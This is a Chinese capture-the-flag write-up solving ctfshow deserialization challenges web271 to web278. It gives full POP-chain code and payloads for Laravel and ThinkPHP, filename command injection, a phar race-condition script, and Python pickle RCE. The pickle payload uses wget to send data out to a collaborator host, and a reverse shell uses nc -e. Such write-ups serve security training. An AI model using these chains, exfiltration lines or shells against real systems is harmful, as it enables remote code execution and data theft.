目录
1、web271
2、web272
3、web273
4、web274
5、web275
6、web276
7、web277
8、web278
laravel 反序列化漏洞
1、web271
laravel 5.7(CVE-2019-9081)
poc
<?php
namespace Illuminate\Foundation\Testing{use Illuminate\Auth\GenericUser;use Illuminate\Foundation\Application;class PendingCommand{protected $command;protected $parameters;public $test;protected $app;public function __construct(){$this->command="system";$this->parameters[]="cat /flag";$this->test=new GenericUser();$this->app=new Application();}}
}
namespace Illuminate\Foundation{class Application{protected $bindings = [];public function __construct(){$this->bindings=array('Illuminate\Contracts\Console\Kernel'=>array('concrete'=>'Illuminate\Foundation\Application'));}}
}
namespace Illuminate\Auth{class GenericUser{protected $attributes;public function __construct(){$this->attributes['expectedOutput']=['hello','world'];$this->attributes['expectedQuestions']=['hello','world'];}}
}
namespace{use Illuminate\Foundation\Testing\PendingCommand;echo urlencode(serialize(new PendingCommand()));
}
payload:
data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7D%7D
2、web272
Laravel 5.8(CVE-2019-9081)
poc
<?php
namespace Illuminate\Broadcasting{use Illuminate\Bus\Dispatcher;use Illuminate\Foundation\Console\QueuedCommand;class PendingBroadcast{protected $events;protected $event;public function __construct(){$this->events=new Dispatcher();$this->event=new QueuedCommand();}}
}
namespace Illuminate\Foundation\Console{class QueuedCommand{public $connection="cat /flag";}
}
namespace Illuminate\Bus{class Dispatcher{protected $queueResolver="system";}
}
namespace{use Illuminate\Broadcasting\PendingBroadcast;echo urlencode(serialize(new PendingBroadcast()));
}
payload:
data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D
3、web273
Laravel 5.8(CVE-2019-9081)
web272 的 payload:
data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D
4、web274
ThinkPHP V5.1
exp
<?php
namespace think;abstract class Model{protected $append = [];private $data = [];public function __construct(){$this->append = ["li"=>[]];$this->data = ["li"=>new Request()];}
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows{private $files = [];public function __construct(){$this->files = [new Pivot()];}
}
namespace think\model;
use think\model;
class Pivot extends Model{}
namespace think;
class Request{protected $hook = [];protected $filter;protected $config;protected $param = [];public function __construct(){$this->hook = ["visible"=>[$this,"isAjax"]];$this->filter = 'system';$this->config = ["var_ajax"=>''];$this->param = ['cat /f*'];}
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>
payload:
?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJsaSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoibGkiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6NztpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fXM6ODoiACoAcGFyYW0iO2E6MTp7aTowO3M6NzoiY2F0IC9mKiI7fX19fX19
5、web275
system('rm '.$this->filename);
filename 可控,使用分号截断实现命令执行
?fn=1.php;ls;
读取 flag.php
?fn=1.php;tac flag.php;
拿到 flag:ctfshow{28fb8db5-7e60-4876-9079-f4e64554eb77}
6、web276
新增对 admin 的判断
public $admin = false; admin 默认是 false ,我们需要修改它为 true 才会进入 system。
但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化 manifest 中的字符串,采用 phar 协议来读取即可。
生成 phar 文件:
<?php
class filter{public $filename = "1.php;tac f*;";public $filecontent;public $evilfile = true;public $admin = true;
}
$o = new filter();$phar = new Phar("my.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("my.txt", "my");
$phar->stopBuffering();
?>
这里还需要结合条件竞争,因为我们写入的这个 phar 文件会被删除,我们需要在它还没有被删除前访问到它,触发反序列化。
exp:
import threading
import requestsurl = "http://882d7c83-d5eb-4fec-abd6-3eca2abc1283.challenge.ctf.show/"
content = open("my.phar", "rb").read()
found_flag = Falsedef upload():requests.post(url=url + "?fn=my.phar", data=content)def read():global found_flagresponse = requests.post(url=url + "?fn=phar://my.phar/", data="1")if "ctfshow{" in response.text or "flag{" in response.text:print(response.text)found_flag = Truewhile not found_flag:threading.Thread(target=upload).start()threading.Thread(target=read).start()
拿到 flag:ctfshow{99e96faa-80bf-4ba6-b915-dfbdccf5067a}
7、web277
python 反序列化
import os
import pickle
import base64class RCE(object):def __reduce__(self):return (os.popen, ('wget il7p6a9q8k2lxm0uh96ux3uif9l09rxg.oastify.com?1=`cat f*`',))print(base64.b64encode(pickle.dumps(RCE())))
结合 bp 的 Collaborator 模块外带
payload:
backdoor?data=gASVUwAAAAAAAACMAm9zlIwFcG9wZW6Uk5SMPHdnZXQgaWw3cDZhOXE4azJseG0wdWg5NnV4M3VpZjlsMDlyeGcub2FzdGlmeS5jb20/MT1gY2F0IGYqYJSFlFKULg==
拿到 flag:ctfshow{2d4f0ae3-dc87-4c9d-b054-9e563bc3886a}
也可以反弹 shell
import pickle
import base64class cmd():def __reduce__(self):return (eval,("__import__('os').popen('nc ip port -e /bin/sh').read()",))c = cmd()
c = pickle.dumps(c)
print(base64.b64encode(c))
8、web278
过滤了 os.system,方法同上